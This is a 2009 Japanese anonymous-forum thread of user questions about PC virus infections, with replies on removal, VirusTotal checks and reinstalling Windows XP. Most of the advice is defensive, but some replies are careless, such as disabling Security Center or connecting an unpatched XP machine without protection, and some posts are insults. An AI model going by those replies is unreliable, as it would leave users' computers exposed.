09/03/07 00:13:30
>546 悪いだと?お前、それ誰にいってんの?あ~ぁお前自身の事か。 納得
551:名無しさん@お腹いっぱい。
09/03/07 02:47:46
IEが自動で大量に開いて特定のサイトにアクセスしようとする
その後、エラーの警告文でこう表示される
「不明なソフトウェア例外(0xe0bd7363)がアプリケーション0x7e812a5b」
素人なりにIEごと消そうと、ゴミ箱⇒ディスククリーンしたけどまだ治まらない
知恵を貸してください
OSはXP、ウィルス対策に入れてるノートンでは感知されませんでした
552:名無しさん@お腹いっぱい。
09/03/07 08:38:53
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7
./ ./ ̄/ / /__/ / / ____  ̄ / /
'ー' _/ / ___ノ / /____/ ___ノ /
/___ノ /____,./ /____,./
_ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7
/ ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._
 ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./
/__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
553:名無しさん@お腹いっぱい。
09/03/07 11:04:19
>>549
お断りします
お断りします
ハハ ハハ
(゚ω゚)゚ω゚)
/ \ \
((⊂ ) ノ\つノ\つ)
(_⌒ヽ ⌒ヽ
丶 ヘ | ヘ |
εニ三 ノノ Jノ J
554:名無しさん@お腹いっぱい。
09/03/07 17:08:11
とりあえずセキュリティセンターを、無効にしてみたら???
555:名無しさん@お腹いっぱい。
09/03/08 03:08:35
>>536です。
>>542 言われた通りググって色々調べた結果、問題解決しそうです。有難うございました。それから543と545は私ではありません。念の為に(^_^;)
556:名無しさん@お腹いっぱい。
09/03/08 15:26:16
ビヘイビアブロッキングとか挙動を監視する技術あるけど、それがあれば重要な
ファイルとか削除する前に警告がでるの?
ウィルスそれをかいくぐってできることって何があるの?
557:556
09/03/08 15:45:07
ごめん、解決した
558:名無しさん@お腹いっぱい。
09/03/14 11:47:30
━━━━━━━━━━━━━━━━━
【使用OS】 『XP sp3』
【使用ブラウザ】 『IE7』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『Norton Internet Security』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ケーブルでモデムのみ使用』
NORTONでシステムの完全スキャンをしたところ、「Backdoor.Trojanをウイルススキャナが検出しました」
とでました。
で、
状態:削除しました
推奨する処理:解決しました-処理なし
となっています。
これはもう問題は完全に解決したと考えてよいのでしょうか?
クリーンインストールなどは不要でしょうか。
ちなみに
URLリンク(www.symantec.com)
の駆除方法に従ってなんらかの作業してみようとしましたが、
「4. レジストリから値を削除する」
の段階で指定されているサブキーが見つかりません。
どなたかご教示いただければ幸いです
559:名無しさん@お腹いっぱい。
09/03/14 12:01:58
>>558
マルチはダメ
スレリンク(sec板:528番)
560:名無しさん@お腹いっぱい。
09/03/14 12:16:17
>>559
なぜマルチが駄目なのか詳しく理由を
お礼を書けばいいじゃないですか?
561:名無しさん@お腹いっぱい。
09/03/14 12:29:05
>>560
マルチポストでぐぐれ
562:名無しさん@お腹いっぱい。
09/03/14 12:32:35
マルチポストが駄目な理由もわからんようなのが2cすんなよ。
563:名無しさん@お腹いっぱい。
09/03/14 13:28:41
カスどもが利用されるのは当たり前だろ
564:名無しさん@お腹いっぱい。
09/03/14 13:56:44
そりゃ当たり前だな
こいつらは利用されてなんぼ
565:名無しさん@お腹いっぱい。
09/03/14 14:02:27
その利用されて何ぼの奴からも拒否されるってのも大概だけどなw
566:名無しさん@お腹いっぱい。
09/03/15 11:29:32
昨日1rkの■5MBにも載っているロダで、元ファイル名***.jpg、
ロダのファイル名********.jpgをクリックしたら、エロサイトにつながって
ノートン先生が反応したのだが、これって何?
567:名無しさん@お腹いっぱい。
09/03/15 11:59:10
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
568:名無しさん@お腹いっぱい。
09/03/15 12:03:33
それもう秋田
569:名無しさん@お腹いっぱい。
09/03/15 13:23:07
そういわずに答えろよ
570:449
09/03/15 13:56:34
>>451
レスしてくれてサンクスです。削除したら問題ないんですね。
アクセス規制にまきこまれてレスできなくて遅くなりました。
571:名無しさん@お腹いっぱい。
09/03/15 15:11:39
Firefoxのアドオンと何かを入れてたフォルダが突然消えたわけだが
Avastインスコ済み
572:名無しさん@お腹いっぱい。
09/03/15 15:26:04
そうですか、それは大変ですね
573:名無しさん@お腹いっぱい。
09/03/15 15:30:24
そうですか、それは大変なんですよ
574:名無しさん@お腹いっぱい。
09/03/15 15:42:55
ご愁傷様です。
次
575:名無しさん@お腹いっぱい。
09/03/15 15:44:15
>>574
ご冥福のAAが貼られるかと期待したのに
576:名無しさん@お腹いっぱい。
09/03/15 16:07:13
>>567
これで漏れたやつはいるのかねぇ
577:名無しさん@お腹いっぱい。
09/03/15 16:16:35
板違い
578:名無しさん@お腹いっぱい。
09/03/15 19:18:07
>>577
失せろカス
579:名無しさん@お腹いっぱい。
09/03/16 20:46:09
【使用OS】 「WindowsXP SP2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【ルータの有無】 「有り」
Setup.exeが入ったAutorun付きのISOファイルを実行してしまいました。Setup.exeをオンライン検索かけたら
URLリンク(www.virustotal.com)
の結果になったのですが、これはどういったウィルスでしょうか?
Setup.exeをウィルスバスターで検索かけてもウィルスは検出されませんでした。
580:名無しさん@お腹いっぱい。
09/03/16 20:50:41
そのISOはどこで落としたのかな?
581:名無しさん@お腹いっぱい。
09/03/16 21:39:26
>>580
スレリンク(download板:976番)
582:名無しさん@お腹いっぱい。
09/03/16 22:48:02
やっぱりか。
板違いだから帰れ。
583:名無しさん@お腹いっぱい。
09/03/17 20:59:20
お前が消えろ 死ね
584:名無しさん@お腹いっぱい。
09/03/18 10:09:05
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「avast最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybotとスパイブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
スタートメニューに急に「elo114.exe」というメニューが出現してびっくりしています。
ウィルスかスパイウェアでしょうか?
間違えてダブルクリックしてしまったのですが何も起こりません。
585:名無しさん@お腹いっぱい。
09/03/18 10:24:44
最近、ExpListOutっていうソフト使わなかった?
586:名無しさん@お腹いっぱい。
09/03/18 10:33:55
>>585
レスありがとうございます。
使いました。
でもエラーが出て使えなかったので削除しました。
587:名無しさん@お腹いっぱい。
09/03/18 10:50:45
単にVistaの、最近使用したプログラムを簡単に実行できるようにするための機能だから問題ないし
もう使わないのであれば右クリックから消せる。
588:名無しさん@お腹いっぱい。
09/03/18 11:02:17
>>587
そうなんですね、安心しました。
ありがとうございました。
589:名無しさん@お腹いっぱい。
09/03/18 11:17:32
imac+xp sp3の環境です。
「rxicjjvn.dll」というdllが感染しているとの警告を受けたのですが
もう一台のxp sp3(PC機)にはこのような名前のdllは存在しません。
bootcamp特有のdllなのか、それともただのウィルスなのか判断できません。
皆さんのwindows\system32にもこのようなファイルがありますか?
削除しても大丈夫なのでしょうか?
GGっても出てこないので質問させて頂きました。
宜しくお願いします。
590: ◆N9P3SuvBPo
09/03/19 16:46:08
>589
レス遅れた、すまない。
PC2台所有してるのですね。
macとXPのデュアルブート環境で、「rxicjjvn.dll」というファイルが感染してるんですね。
どうみてもこんなランダムな名前のファイル、通常は存在しない。
ウイルス名は分からないの?
591:589
09/03/20 01:14:40
>>590さん
お世話になります。
kaspersky&symantecのonlinescanではtrojan clickerって診断されているのですが
悪意のあるソフトウェアの削除ツール&bitdefenderでは反応なしです。
恐らくウィルスであることは間違いないと思うのですが
削除してしまっても問題ないのかが気になります。
unlocker1.8.7で該dllのwinlogon.exeでの使用(?)は切れたのですが
explorer.exeでの使用(?)を切るとwindows\system32フォルダがフリーズしてしまいます。
590さんの環境下で存在しないdllの様なので、削除しても、os自体が立ち上がらないような
重要なものではなさそうですね。
削除して、少し様子を見てみます。
お気遣い頂き有難う御座いました。
592: ◆N9P3SuvBPo
09/03/20 07:23:40
>591
補足しておくと、ファイルのプロパティというのを見れば
正規のファイルか、悪意のあるファイルかは区別が付きます。
593:名無しさん@お腹いっぱい。
09/03/20 15:58:59
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
594:名無しさん@お腹いっぱい。
09/03/21 16:39:44
USBカメラについてたドライバいれたら、NODでウイルス反応が出たんですけど、
Nortonでは無反応でした。
どっちが正解なのか分からないのですが、調べる方法はありますか?
595:名無しさん@お腹いっぱい。
09/03/21 22:03:11
>>594
virustotalに投げてみ。
URLリンク(www.virustotal.com)
こんな感じで、色んなウイルス対策ソフトで判定してもらえる。
URLリンク(www.virustotal.com)
真性ウイルスだと複数(大抵5個以上)のソフトでウイルス判定される。
自分で判断できなかったら、スレに上記と同じようにアドレスを貼って、他の人にも意見を聞いてみる。
596:名無しさん@お腹いっぱい。
09/03/21 22:04:31
>>594
自己判断するしかないのだかvirustotalにファイルを上げてみては。
代理店はキヤノンだっけ?時間がかかるだろうが検体送ればry
597:596
09/03/21 22:06:45
ありゃりゃ、被っちまったぃw
598:名無しさん@お腹いっぱい。
09/03/21 22:14:32
以前使っていたけど、NODは誤検出が多いすね。提灯テスト結果と違って。
599:594
09/03/22 00:19:42
レスありがとう御座います。
さっそくやってみました。
以下の結果がでたのですが、これは黒ってことでしょうか?
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
600:595
09/03/22 00:51:28
>>599
これはかなり珍しいパターンだね。メジャー所がみんな取りこぼして(検知していない)、マイナー所が複数検知してる。
このパターンアド誤検出の可能性も残るが、俺はほぼ黒と見ました。
買ったばっかりの物にウイルスが入っていたのなら、念のためUSBカメラのメーカーにメールした方が良いかも。
(NODで検知したことと、virustotalのアドレスを貼り付けてメール)
あと、検出結果のページの日付が少し古いので、既に他の人が一度解析している。
最新の情報が欲しい時は、ファイルを送った後に、『ファイルの再解析』ボタン(右側)を押すと、
最新の解析結果がもらえるので、気になるなら再解析してからメールすると、なお良い。
601:595
09/03/22 00:53:17
>>600
おっとっと、書き間違い。
× このパターンアド誤検出の可能性も残るが
○ このパターンだと誤検出の可能性も残るが
602:名無しさん@お腹いっぱい。
09/03/22 10:54:33
シマンテックの配付ファイルが原因でGoogleポインズニングにまで発展
URLリンク(antivirus-news.net)
>この事件は、セキュリティベンダーの社会的責任が非常に重いことを意味するものと言えるだろう。
wwwwwwwwwwwwwwwwwwww
603:名無しさん@お腹いっぱい。
09/03/22 11:32:46
>ESET社(NOD32、ESS)のサイトが
>中華にクラックされウイルスを仕込まれた
>URLリンク(www.avertlabs.com)
>(隠蔽しているのでMcAfeeブログより)
>
>公式サイトでウイルス貰えました。
セキュリティベンダーの公式サイトで、
ウイルス配布している所もあったしさ。orz
604:名無しさん@お腹いっぱい。
09/03/23 08:55:48
いきなりミッ○ーマ○スのテーマが流れだして1分位で止まった
とりあえず隠しファイル含めた履歴全部消してみたけど・・・
何のウィルスこれ?俺のパソコン大丈夫ですか?
605:名無しさん@お腹いっぱい。
09/03/23 09:20:08
おそらくミッキーマウスマーチの音楽ファイルを再生しただけですよ。
問題ないです。
606:名無しさん@お腹いっぱい。
09/03/23 09:27:40
ソフトウェアの脆弱性を利用され、PCを遠隔操作された
その曲を指定した時間、又は何か特定の操作をしたら流すマルウェアに感染した
あなたがその曲をプレイヤ-に入れていて、何らかの操作により再生された
あなたの家族や友人が指定した時間、又は何か特定の操作をしたら流すように設定した
せめてテンプレくらい埋めてくれないとなんとも・・・
607:名無しさん@お腹いっぱい。
09/03/24 03:46:21
HDDの中の画像ファイルを検索して破壊するようなウィルスはありますか?
608:名無しさん@お腹いっぱい。
09/03/24 04:01:59
>>607
原田君ですか?
あるかと聞かれれば「ある」。
609:名無しさん@お腹いっぱい。
09/03/24 11:36:46
端末が100台程ある社内LAN環境で、Windows Severの脆弱性を悪用したウィルスに感染したマシンが発生し、一気にウィルスが広まりました。
LANは外部とは一切繋がっておらず、恐らくUSBメモリから感染したと思われます。
USBメモリは決まった物しか使用してはならない決まりですが、個人持ちも使おうと思えば使えます。
が、誰も自分が使ったとは言いません。
OSはWin2000、スキャンソフトはMcAfee、パターンファイルは一部のマシンがまったくアップデートしておらず、
MSから出しているOSの脆弱絡みのパッチは一切適用していない環境です。
パターンファイルが適用されているマシンは、バッファオーバーフローを検知し、怪しげなbatファイルの実行も検知しました。
フルスキャンをかけるとSYSTEM32下の一部EXEがウィルスに感染していました。
パターンファイルが適用されていないマシンは感染ファイルをばらまき、OSの脆弱を利用したアタックを他のマシンにかけていました。
長々と書きましたが、感染源(PC)を特定する良い方法などありますでしょうか?
皆さんのお知恵を貸して下さい。
610: ◆N9P3SuvBPo
09/03/24 23:38:23
>609
特定とかより、感染しているPCに入ってる重要なデータを退避させて
クリーンインストールを行なうことを奨めます。
企業では特定するより、被害の拡大を如何に早く食い止め、如何に早く復旧できるかの問題ですからね。
611:609
09/03/25 07:54:51
>>610
幸い対策はすぐに取れたのでそちらの心配はないのですが
上への報告が必要なので…
612:名無しさん@お腹いっぱい。
09/03/26 10:11:16
世間は本当に不況なんだよなぁ。
幸い俺の所は不況知らずで、最近も20人程外向さんを雇ったんだけど
いつもは面接で顔を見た瞬間駄目だというやつが多かったが
今回はまともな人間がすぐに揃ったよ
613:名無しさん@お腹いっぱい。
09/03/26 10:12:22
すいません。間違えました。
614:名無しさん@お腹いっぱい。
09/03/28 02:35:28
・パソコン起動するたびにMicrosoftUpdateの自動更新がオフにされている。
・Micorosoft、トレンドマイクロ、シマンテックなどの公式サイトがブラウザで見れない。
このような影響のあるウィルスってありますか?
これってやっぱりウィルスのせいなんでしょうか・・・
615:名無しさん@お腹いっぱい。
09/03/28 05:21:23
マルウエアだと思うよ
616:名無しさん@お腹いっぱい。
09/03/28 09:17:24
特定のホームページが読み込みエラーになるようなウィルスっていますか?
試したところ、
・マイクロソフト
・シマンテック
・トレンドマイクロ
は読み込みエラーになってしまいます。
以前は見れていました。他のHPは表示できています。
617:名無しさん@お腹いっぱい。
09/03/28 09:20:37
【使用OS】 Vista
【Microsoft Update(MU)の状態】 してます
【使用セキュリティソフトとバージョン】 avast最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Widowa Defender
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
スタートアップに services.exe が登録されていました。製造元は不明と表示されています。
コマンドは、C:\Users\******r\AppData\Local\services.exe
(正規のservices.exeはsystem32フォルダにあると聞きました)
タスマネから見ると、ユーザー名がsystemで説明が「サービスとコントローラアプリケーション」と書いてあるservices.exe
ともうひとつ
怪しいと思っている、services.exeがあります。
それが、ユーザー名****** 説明は、「services.exe」です。
2種類ありました。片方は正規?のsystem32関連だと思われるのですが
もうひとつがわかりません。ググるとマルウェア?ウイルス?など
あまり良いことは書いてありませんでしたので、質問にきました。
618:名無しさん@お腹いっぱい。
09/03/30 22:19:16
>>617
URLリンク(www.symantec.com)
これだと思いますが、どうでしょう?
619:名無しさん@お腹いっぱい。
09/03/31 06:33:27
>>618
617です。情報ありがとう。
でもシマンテックのHPが見れないので、そのアドレスも表示できないんです。
どうすれば。。。(^_^;)
620:名無しさん@お腹いっぱい。
09/03/31 06:49:20
もしかして、マイクロソフトのサイトも表示できなかったり?
だとしたらリカバリしかない。そういうウィルスだから
621:名無しさん@お腹いっぱい。
09/03/31 12:56:07
マイクロソフトも表示できないです。
とりあえずOS入れ直す方向で考えて見ます。
情報ありがとうです。
622:名無しさん@お腹いっぱい。
09/03/31 22:45:38
>>619
>でもシマンテックのHPが見れないので
あ、ごめんね。
えーっとHPより抜粋するに
1. セーフモードで起動して
2. 該当のファイルを削除して
3. 下記のレジストリを消せば大丈夫だと思われます
HKEY_CURRENT_USER¥Software¥Microsoft¥Windows¥CurrentVersion¥Run¥"[ランダムな名前]" = "[トロイの木馬へのパス]"
注意: [ランダムな名前] は、次のリストから得られてます。
CrashDump
EventLog
Init
lsass
Regscan
RunDll
Setup
Sound
svchosts
System
TaskMon
UPNP
Windows
がんばって!
623:名無しさん@お腹いっぱい。
09/04/01 00:19:14
>>620
嘘は良くない
ちゃんとレジストリ修復で修復可能
624:名無しさん@お腹いっぱい。
09/04/01 01:05:40
レジストリ修復?
平たく言うと?
リンク切れのことか?
625:名無しさん@お腹いっぱい。
09/04/01 02:00:30
つか、セキュリティーソフトのベンダーに繋がらないのってマルウエアの症状そのものじゃん。
SUPEPAntispywareを使うといいよ。
CCCクリーナーも意外に頑張ってくれるから(完治ではないが多少は緩和する)試してみるといいかも。
626:名無しさん@お腹いっぱい。
09/04/02 00:26:19
リカバリについて教えてください。
パソコン購入時に付いてきたCD-ROM 2枚あるのですが
マイクロソフト オフィス パーソナル エディション 2003
というのはリカバリディスクではないのでしょうか?
ウイルスに感染しているのが確実なようでウイルスのサイトは表示されません。
取説を読むとリカバリディスクは付いていないと書いてあります。
リカバリ手順は調べたのですがディスクは?というところで止まってしまいました。
よろしくお願いいたします。
627:名無しさん@お腹いっぱい。
09/04/02 00:37:59
>>626
一枚はワードとかエクセルですね。
もう一枚はその他の付属ソフトかな…?
もしかして冊子なくしたのかな?
とりあえず
1.PCメーカ名
2.使用PCの型番
を書きましょう。
628:627
09/04/02 00:43:56
すまない「取説」あるんだ。
それにリカバリ方法がないのなら
他の冊子に乗っているかと。
付属本は(2~3)冊あると思うよ。
629:名無しさん@お腹いっぱい。
09/04/02 01:04:07
>>626です
ありがとうございます。
SONYのVAIO
PCV-W702B/W502B
です。
かなり前、Win95や98の頃リカバリはやったことがあるのですが…今回はXPでさらに感染が確実なようでウイルス対策をしていなかったことを後悔しています。
630:627
09/04/02 01:17:00
つURLリンク(dlv.update.sony.net)
"リカバリディスク作成/リカバリ"参照して
631:名無しさん@お腹いっぱい。
09/04/02 01:18:14
>>626です
取説にリカバリディスクを入れると書いてあるのですが
リカバリディスクの存在が不明!?なのです。
購入時に付いていたものは全部とっておいているはずなのですが
取説によると付属のCDは先の2枚のようで、リカバリディスクは
使用前に自分で作るか有償と書いてあります。
自分では作成しておらず、オンラインのユーザー登録も
していませんでした。昔と違ってリカバリディスクというのは
付属ではないということなのでしょうか?
632:名無しさん@お腹いっぱい。
09/04/02 01:28:14
>>630様
>>626です
教えて頂きありがとうございます。
携帯から見ようとしたのですが容量が大きく見れないようです。
後でパソコンで見られたら良いのですが全体的に
調子が悪く見られるかわかりません。
また結果をご報告させていただきますね。
遅い時間にありがとうございます。
633:627
09/04/02 01:31:27
先に示したリンク先の180ページ"C:ドライブのリカバリ"を実行したあとに
セキュリティソフトインストール>Office等インストール>Windoes Update
>Dドライブ以降のフルスキャン
"Dドライブ以降のフルスキャン"これ大事。
リカバリディスクの作成方法もリンク先に載っているね。今回は上記の方法で再セットアップ
したあとでリカバリディスクの作成をしておこう。
634:名無しさん@お腹いっぱい。
09/04/02 01:38:46
>>627様
ありがとうございます。明日にでもレスいただいた手順でやってみたいと思います。
635:627
09/04/02 01:40:38
見られないのか…
ディスクを作成していないとOSを立ち上げた状態からリカバリするしかないみたいだ。
スタート>すべてのプログラム>VAIOリカバリツール>VAIOリカバリユーティリティ
後は"OK"とか"次"をクリックしていけばOK
636:627
09/04/02 01:50:16
そうそう、ルータがない場合セキュリティソフト(PFW付き)をインストールするまでは
絶対にネットにつないではいけないよ。
637:名無しさん@お腹いっぱい。
09/04/02 02:39:48
URLリンク(www.alpha-net.ne.jp)
このアドレスは無限回廊って犯罪の有名なデータベースサイトなんだけど、
自分のパソコンじゃ反応しないのに知り合いのパソコンはウィルスに反応したって言われた
これってどうなのか教えて下さい
【使用OS】 winXp
【Microsoft Update(MU)の状態】 自動にしてる
【使用セキュリティソフトとバージョン】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【ルータの有無】 有
638:名無しさん@お腹いっぱい。
09/04/02 09:12:42
一通り回ってきたけど、Aviraでは無反応。
どこで反応したかは分かる?
639:名無しさん@お腹いっぱい。
09/04/02 13:41:41
ウィルスバスタ2009で検索かけてみたらウィルス発見しました
2つあって名前はそれぞれVBS PSYME.CTEとHTML WEBKIT.AIというみたいなんですが
処理状況が「対処できないウイルスに感染したファイルが、感染の拡大を防ぐために隔離されました。」と出ていて
これはつまり完全には駆除してませんよ。という意味で、まだPC内に存在しているということでそゆか
もしそうなら処理方法を教えてほしいです
640:名無しさん@お腹いっぱい。
09/04/02 14:51:09
>>639
その手のマルウエアはリアルタイム検索で(サイトを開いたとき)
検出されるのが普通で、windoes update やflash player等の脆弱性がなければ感染しない。
今回検出されたファイルはウイルスそのものなので駆除(正常なファイルに戻す)ことはできない。
隔離されたファイルを削除すればよい。(その後、念のためフルスキャン)
VB2009は使用したことがないので操作手順はわからないが、右下のバスターアイコン(カプセルマーク)から
操作設定画面をたちあげて処理することになる。
昔のバージョンと同じなら隔離されたファイルはこの中にある。
C:\Program Files\Trend Micro\Virus Buster 2009\Quarantine
正規ユーザーなら、本家のヘルプ見てもわからない場合サポートも含めた料金を払っているのだからサポートに聞きなさいよと。
641:名無しさん@お腹いっぱい。
09/04/02 15:18:32
PC買ったときについてきたバスタ2008を入れたら
入れる前と比べてかなり重くてアンインスコ
その後何も入れてないんだが何か入れたほうがいいだろうか?
ブラウザはfirefoxでWindows Defenderがある
ごくたまにWindows Live OneCare PC セーフティで(これはIE
スキャンするも毎回感染なし
642:名無しさん@お腹いっぱい。
09/04/02 15:30:31
お前がそれでいいんならいいなじゃないの?
アンチウイルスの常駐とFWは最低限入れろっても、どうせ重くなるっていいだすだろうしな。
643:名無しさん@お腹いっぱい。
09/04/02 15:34:47
FWはネトゲする時以外はすべての着信接続をブロックにするにしてる
644:名無しさん@お腹いっぱい。
09/04/02 15:58:31
>>638
んー、ちょっと分かんないですね…
すいません…
645:名無しさん@お腹いっぱい。
09/04/02 16:30:15
Hotmailを今日チェックしようと思ってIEで開いたらクッキーに残してあったアドレスが全然違うものになってました
babbあっとxx.しーおー.jpになってたんですがこれってウイルスか何かですか?
アドレスはもちろん全部半角英数だったんですが「xx」ってなってるのが気になって
ググってもわかりませんでした
646:626
09/04/02 18:19:34
>>627様
>>630の手順でセキュリティソフトのインストールまできましたが
続きができません。
リカバリ前に無料のオンラインスキャンもサイトが表示されないので
ウイルスバスター2009を買ってきたのですが、ソフトを入れたら
ウイルスバスター2009インストーラ
セットアッププログラムは、必要なサービスパック
がこのコンピュータのウィンドウズXPに適用されていないことを
検出しました。
【ウィンドウズアップデートの実行】を
クリックして、サービスパックをダウンロードしてください。
と出ています。リカバリ前には、それでもアップデートしようと
しましたが、やはり表示されませんでした。
ウイルスをスキャンや駆除しようとするのを妨害するかのように…。
先程、Cドライブをリカバリ→
(取説の流れで)Office等インストール→ウイルスバスターの
ソフトを入れたら上記のように出ました。
まだネットに繋いではいけないのにアップデートをしなければ
いけないということですよね?
ここでまた止まってしまいました。(泣)
光で1台しかなく困っています。
また教えていただけましたら助かります。
よろしくお願いいたします。
647:名無しさん@お腹いっぱい。
09/04/02 18:37:43
一回ネットに繋いでSP2なり3なり適用すりゃいいじゃん
バスターなんか買ってる時点で終わってるけど・・・
648:名無しさん@お腹いっぱい。
09/04/02 18:39:36
光でルータ無いの?
ルータが有ればネットに接続しても大丈夫だよ。
649:627
09/04/02 20:26:08
バスター2009の作動条件がSP2以降等のためインストールできないのでしょう。
一番良いのはnecとかbuffaloの"ブロードバンドルータ"を購入することなのですが…
バンドルされているノートンとかバスターの試用版があると仮定して話をすすめます。
試用版(PFW付が条件)をインストール>windoes update>試用版アンインストール
(通常のアンインストール後、ノートンの場合専用のアンインストーラをシマンテックのサイトから
落として実行)>バスター2009インストール
ノートン・アンインストーラー
URLリンク(service1.symantec.com)
650:名無しさん@お腹いっぱい。
09/04/02 20:46:14
クリーンインスコしたんならうpだての間ノーガードでもたいして問題ねーだろ
651: ◆N9P3SuvBPo
09/04/02 21:32:27
>650
本気で言ってるんですか?
ルータ無しでSP2以前のXPや2000でネットに繋いだら数分で終わるぞ。
ネットサーフィンしなくても勝手に入ってくるから。
652:名無しさん@お腹いっぱい。
09/04/02 21:34:11
アホかw
その後すぐバスター入れてフルスキャンするんだろーがw
653:名無しさん@お腹いっぱい。
09/04/02 21:45:51
感染してからセキュリティソフト入れたって無意味っすよ
654:名無しさん@お腹いっぱい。
09/04/02 21:48:17
なんのためのクリーンインストールやらw
655: ◆N9P3SuvBPo
09/04/02 22:00:31
>>649
もう一回リカバリ作業が必要になりますが、このサイトからSP2インストールCDを入手してください。
URLリンク(www.microsoft.com)
注文方法はどっちでも構いませんが、お奨めはFAXによる注文ですかね…
CDが届いたらリカバリしてSP2をインストール、バスター2009インストール、WindowsUpdateという手順を踏んではどうですか?
656:627
09/04/02 22:11:41
>>655
私にレスされても…w
1000円ちょっとですがFAXしたり届くまで時間かかりそうだし…
私なら安物でもよいからルータ買いますね。
657: ◆N9P3SuvBPo
09/04/02 22:19:54
>656
うぎゃあ!!
質問者の方と勘違いしてしまいました…
658:626
09/04/02 23:43:40
>>627様
>>655様
ありがとうございます。
ウイルス対策やアップデートもせずにいたことを反省しています。
オンラインで何もできないのなら製品版しかないのかと思いまして
購入しましたが一人では解決できず、またパソコンはそれしかないので
調べることもできません。教えて頂きまして本当に助かります。
プロバイダは感染の可能性を教えてくれるまでですし、
皆さんはバスターなんてと書いておられましたが量販店では
オススメとのこと…。
パソコンメーカーに聞けば?とも言われたりしたのですが
オンラインのユーザー登録もしていなかったので繋げない今は
ここで親切に教えていただけてとても嬉しいです。
ルータは使ったことがないのですが先にあげていただいたのが
オススメなのでしょうか?
光で今後も1台のみ利用の予定です。
よろしくお願いいたします。
659:627
09/04/03 00:47:35
>>658
私見ですが"お店のお勧め"="良い製品"とは限りません。
"お店のお勧め"="捌きたい製品"のときもあります。
上記はバスターを批判しているわけではありません。すべての商品に対しての私見です。
最近のセキュリティソフトはそれなりにメモリを積んでいないと辛いです。
XPなら最低512Mはほしいですね。
ネットでの製品情報も(個人のブログ含め)さくらの書き込みがないとはいえないことも念頭に入れてください。
その上で価格コムの有線ルーター 満足度ランキング(10000円以下)を5位までかいておきます。
満足度5.00が満点
2004年 7月下旬発売 バッファロー BHR-4RV 最安値:\7,216 満足度4.72 採点人数5人 口コミ件数 347件
2007年 8月下旬発売 IODATA ETX-R 最安値:\2,370 満足度4.12 採点人数17人 口コミ件数 309件
2003年10月下旬発売 バッファロー BBR-4HG 最安値:\4,329 満足度3.58 9人 口コミ件数 3061件
2006年 2月上旬発売 IODATA NP-BBRL 最安値:\2,483 満足度3.27 6人 口コミ件数 774件
2007年 6月下旬発売 COREGA CG-BARFX3 最安値:\2,483 満足度2.43 3人 口コミ件数 73件
660:626
09/04/03 01:23:42
>>627様
丁寧に教えて頂きありがとうございます。
私などは量販店のオススメもパソコンと同時購入で1000円引きなど
これが売りたいんだなと伝わってきてもオススメを買って
しまう無知で いつまでも初心者なのです。
ルータも多分、満足度が高い評価のものを選んでしまうと思います。。。
早速、明日お店に行ってみます。
661:名無しさん@お腹いっぱい。
09/04/03 01:47:12
今後はこれも検討すると良いかも
URLリンク(www.microsoft.com)
662:名無しさん@お腹いっぱい。
09/04/04 13:44:53
URLリンク(www.geno-web.jp)
このページは安心ですか?
663:626
09/04/04 22:55:51
>>627様、教えていただいた皆様、ありがとうございました。
サービスパック3、バスターでスキャンできました。
リカバリディスク作成はこれからになります。
こちらで親切に教えて頂き本当に助かりました。
これからも質問される方のためにレスしていただけたらと思います。
私も少しずつですが自分でも勉強していこうと思います。
重ね重ねありがとうございました。
664:627
09/04/05 00:21:57
>>626
直ってよかったね。
PC使えないと情報収集が困難だからね。
数年前のバスターと今月のカスペは「祭り参加者」にならずにすんだけど…
カスペのはPC使用不能まではならないものの…あせるだろうな。
一歩間違えば被害当事者だ。 ベンダーさん、しっかりしてくれ~
665:名無しさん@お腹いっぱい。
09/04/05 16:09:13
